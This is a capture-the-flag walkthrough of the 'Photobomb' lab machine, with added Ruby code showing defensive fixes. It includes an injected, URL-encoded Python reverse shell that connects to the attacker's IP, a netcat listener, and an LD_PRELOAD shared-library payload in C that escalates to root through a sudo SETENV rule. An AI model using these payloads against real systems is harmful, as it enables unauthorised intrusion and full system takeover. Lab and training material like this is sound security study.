Photobomb

From RCATs

Nmap scan with default scripts and version enumeration.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-29 15:43 MST
Nmap scan report for 10.10.11.182
Host is up (0.068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds

Feroxbuster to find more pages. It only finds /printer, which is also linked from the main page.

┌──[Target:Photobomb🌐IP:10.10.11.182🚀⚔️Attacker:SourMilk📡IP:10.10.10.10🏆Prize:20 points]
└──╼[👾]~ $ feroxbuster --url http://photobomb.htb -w /usr/share/payloads/SecLists/Discovery/Web-Content/raft-medium-directories.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://photobomb.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/payloads/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.1
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       22l       95w      843c http://photobomb.htb/
401      GET        7l       12w      188c http://photobomb.htb/printer
401      GET        7l       12w      188c http://photobomb.htb/printers
401      GET        7l       12w      188c http://photobomb.htb/printer_friendly
401      GET        7l       12w      188c http://photobomb.htb/printerfriendly
401      GET        7l       12w      188c http://photobomb.htb/printer-friendly
[####################] - 2m     60000/60000   0s      found:6       errors:0
[####################] - 2m     30000/30000   248/s   http://photobomb.htb
[####################] - 2m     30000/30000   248/s   http://photobomb.htb/

Inspect photobomb.js on the main page to find credentials, then use them to log in to /printer.

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0...:...Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

Capture the file download request.

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png&dimensions=3000x2000

The filetype parameter is injectable: append a Python reverse shell and URL-encode it.

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.10.10%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27&dimensions=3000x2000

Boom Shell

└──╼[👾]~ $ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.182 47022
/bin/sh: 0: can't access tty; job control turned off
$ ls
log
photobomb.sh
public
resized_images
server.rb
syntaxhighlight_images
$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
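What makes filetype exploitable is that its value is placed into a shell command string. As an added example (not the box's server.rb; the convert command and directory names are assumed), here is that pattern in Ruby beside an allowlist-and-argv version that rejects the injected body from the request above:

```ruby
require 'uri'

# Constructed sample bodies: the benign body from the writeup and a shortened
# form of the injected one (same shape, payload truncated).
BENIGN_BODY   = 'photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png&dimensions=3000x2000'
INJECTED_BODY = 'photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;python3%20-c%20%27import%20socket%27&dimensions=3000x2000'

ALLOWED_FILETYPES = %w[jpg png].freeze
PHOTO_RE          = /\A[A-Za-z0-9_-]+\.jpg\z/   # bare filename: no path or shell characters
DIMENSIONS_RE     = /\A\d{1,5}x\d{1,5}\z/

# Split on '&' only and decode each component, so a ';' inside a value stays
# in that value where the validator can see it.
def parse_form(body)
  body.split('&').each_with_object({}) do |pair, h|
    k, v = pair.split('=', 2)
    h[URI.decode_www_form_component(k)] = URI.decode_www_form_component(v.to_s)
  end
end

# Vulnerable pattern: request values interpolated into one shell string.
# Returned rather than executed, so the effect of the ';' is visible.
def unsafe_command_string(p)
  "convert source_images/#{p['photo']} -resize #{p['dimensions']} " \
    "resized_images/out.#{p['filetype']}"
end

# Hardened form: allowlist every field, then build an argv array for
# system(*argv) so no shell ever parses the values. Returns [true, argv]
# or [false, reason]. (convert/ImageMagick is an assumed resizer.)
def safe_resize_argv(body)
  p = parse_form(body)
  return [false, 'bad photo']      unless p['photo']&.match?(PHOTO_RE)
  return [false, 'bad filetype']   unless ALLOWED_FILETYPES.include?(p['filetype'])
  return [false, 'bad dimensions'] unless p['dimensions']&.match?(DIMENSIONS_RE)
  out = "resized_images/#{File.basename(p['photo'], '.jpg')}_#{p['dimensions']}.#{p['filetype']}"
  [true, ['convert', "source_images/#{p['photo']}", '-resize', p['dimensions'], out]]
end

if __FILE__ == $PROGRAM_NAME
  puts unsafe_command_string(parse_form(INJECTED_BODY))
  p safe_resize_argv(BENIGN_BODY)
  p safe_resize_argv(INJECTED_BODY)
end
```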

Check sudo -l. /opt/cleanup.sh runs as root with NOPASSWD and the SETENV tag.

$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
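An added Ruby check (not part of the writeup) that parses this `sudo -l` output and flags why the SETENV tag matters: secure_path only governs where commands are looked up and does nothing about LD_PRELOAD, so a SETENV rule that runs as root is the critical case.

```ruby
# Constructed sample: the `sudo -l` output shown above, in a non-interpolating heredoc.
SUDO_L_OUTPUT = <<~'OUT'
  Matching Defaults entries for wizard on photobomb:
      env_reset, mail_badpass,
      secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

  User wizard may run the following commands on photobomb:
      (root) SETENV: NOPASSWD: /opt/cleanup.sh
OUT

# A rule line looks like "(runas) TAG: TAG: command".
RULE_RE = /\A\s*\((?<runas>[^)]+)\)\s*(?<tags>(?:[A-Z_]+:\s*)*)(?<cmd>\S.*)\z/

# Returns one finding hash per rule line, with the issues each tag introduces.
def audit_sudo_rules(text)
  text.each_line.filter_map do |line|
    m = RULE_RE.match(line.chomp) or next
    tags = m[:tags].scan(/[A-Z_]+/)
    issues = []
    issues << 'SETENV: caller may pass LD_PRELOAD/PATH into the privileged process' if tags.include?('SETENV')
    issues << 'NOPASSWD: no authentication before the privileged run' if tags.include?('NOPASSWD')
    { runas: m[:runas], tags: tags, command: m[:cmd], issues: issues }
  end
end

# env_reset normally strips LD_* variables; SETENV lets the caller set them
# anyway, so SETENV combined with a root run-as is the case to fix first
# (e.g. drop the tag: "wizard ALL=(root) NOPASSWD: /opt/cleanup.sh").
def critical?(finding)
  runas_user = finding[:runas].split(/[:,]/).first.strip
  finding[:tags].include?('SETENV') && %w[root ALL].include?(runas_user)
end

if __FILE__ == $PROGRAM_NAME
  audit_sudo_rules(SUDO_L_OUTPUT).each do |f|
    puts "#{critical?(f) ? 'CRITICAL' : 'review'} #{f[:command]} as #{f[:runas]}: #{f[:issues].join('; ')}"
  end
end
```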

Do some reading about this. Check secure_path and use /usr/bin/bash instead of the /bin/sh from the article. Create sour.c:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid, setuid */

/* Runs when the library is loaded via LD_PRELOAD (built with -nostartfiles). */
void _init() {
        unsetenv("LD_PRELOAD");   /* avoid re-injecting into the child shell */
        setgid(0);
        setuid(0);
        system("/usr/bin/bash");  /* /usr/bin/bash rather than /bin/sh, see note above */
}

Compile

gcc -fPIC -shared -o sour.so sour.c -nostartfiles

Upload and execute

$ pwd
/tmp
$ sudo LD_PRELOAD=/tmp/sour.so /opt/cleanup.sh
id
uid=0(root) gid=0(root) groups=0(root)

Done!